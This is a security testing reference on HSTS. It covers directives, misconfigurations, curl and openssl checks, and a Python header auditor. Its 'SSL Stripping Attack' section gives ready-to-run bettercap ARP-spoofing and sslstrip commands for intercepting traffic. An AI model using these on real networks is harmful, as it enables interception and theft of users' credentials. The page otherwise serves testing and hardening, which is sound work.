
Overview

HSTS forces browsers to use HTTPS only. Without it, an attacker on the network path can intercept HTTP requests and perform SSL stripping (downgrade HTTPS → HTTP).

Check HSTS

curl -s -I https://TARGET | grep -i "strict-transport-security"

Expected Header

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Directives

Directive         | Description
max-age           | Seconds the browser remembers HTTPS-only. OWASP recommends 63072000 (2 years). Minimum 31536000 (1 year) for preload
includeSubDomains | Apply to all subdomains. Required for preload submission
preload           | Eligible for browser preload list. Has permanent consequences — hard to undo

Misconfigurations

Missing HSTS

No header → SSL stripping possible on first visit.

Low max-age

Strict-Transport-Security: max-age=0
Strict-Transport-Security: max-age=300
max-age=0 disables HSTS. Low values = short protection window.

Missing includeSubDomains

Strict-Transport-Security: max-age=31536000
Subdomains still accessible via HTTP → MITM on subdomain.

HSTS on HTTP Response

An HSTS header on an HTTP (not HTTPS) response is ignored by browsers. It must be served over HTTPS.

Missing preload

Without preload, first visit to site is still vulnerable (TOFU — Trust On First Use).
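A small checker for the directives table and the misconfigurations above (an added example, not part of this page or its tooling): it parses a Strict-Transport-Security value as returned by `curl -s -I` and reports the issues listed in this section. The function names, the two thresholds and the `served_over_https` flag are assumptions of this example.

```python
from typing import Dict, List, Optional
MIN_PRELOAD_MAX_AGE = 31536000   # 1 year: minimum accepted by hstspreload.org
RECOMMENDED_MAX_AGE = 63072000   # 2 years: OWASP recommendation

def parse_hsts(header_value: str) -> Dict[str, Optional[str]]:
    """Split an HSTS value into {directive-name: value-or-None}.
    Names are case-insensitive; a repeated directive makes the whole header
    invalid (RFC 6797), so we refuse it instead of silently keeping one copy.
    """
    directives: Dict[str, Optional[str]] = {}
    for part in header_value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        name = name.strip().lower()
        if name in directives:
            raise ValueError(f"duplicate directive: {name}")
        directives[name] = value.strip().strip('"') if value else None
    return directives

def audit_hsts(header_value: Optional[str], served_over_https: bool = True) -> List[str]:
    """Return the misconfigurations found; an empty list means the header is sound."""
    findings: List[str] = []
    if not served_over_https:
        findings.append("HSTS sent on HTTP response: ignored by browsers")
    if header_value is None:
        findings.append("No HSTS: SSL stripping possible on any visit")
        return findings
    try:
        d = parse_hsts(header_value)
    except ValueError as exc:
        return [f"Invalid header ({exc})"]
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        findings.append("max-age missing or not numeric: header is invalid")
    else:
        age = int(max_age)
        if age == 0:
            findings.append("max-age=0 disables HSTS")
        elif age < MIN_PRELOAD_MAX_AGE:
            findings.append(f"Low max-age ({age}s): short protection window")
        elif age < RECOMMENDED_MAX_AGE:
            findings.append(f"max-age {age}s below OWASP recommendation")
    if "includesubdomains" not in d:
        findings.append("No includeSubDomains: subdomain MITM")
    if "preload" not in d:
        findings.append("No preload: first visit vulnerable (TOFU)")
    return findings
```

Feed it the header value only (everything after `Strict-Transport-Security:`), and pass `served_over_https=False` when the header came from the plain-HTTP response so the ignored-by-browser case is flagged.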

SSL Stripping Attack

When HSTS is missing or expired:

bettercap

» set http.proxy.sslstrip true
» set net.sniff.verbose true
» http.proxy on
» arp.spoof on
» net.sniff on

sslstrip (Legacy)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
Intercepts HTTP → HTTPS redirects. Victim stays on HTTP, attacker proxies to HTTPS.

HSTS Preload

Browsers ship with a hardcoded list of HSTS domains, which protects even the first visit.
https://hstspreload.org/
Requirements:
  • Valid HTTPS on root domain
  • Redirect HTTP → HTTPS
  • HSTS header with max-age >= 31536000, includeSubDomains, preload
  • All subdomains serve HTTPS

Testing

Check Preload Status

https://hstspreload.org/?domain=TARGET

Check HTTP → HTTPS Redirect

curl -s -I http://TARGET | grep -i "location"

Check Certificate

openssl s_client -connect TARGET:443 -servername TARGET </dev/null 2>/dev/null | openssl x509 -noout -dates

Quick Reference

Issue                | Risk
No HSTS              | SSL stripping on any visit
Low max-age          | Short protection window
No includeSubDomains | Subdomain MITM
No preload           | First visit vulnerable (TOFU)
HSTS over HTTP       | Ignored by browser
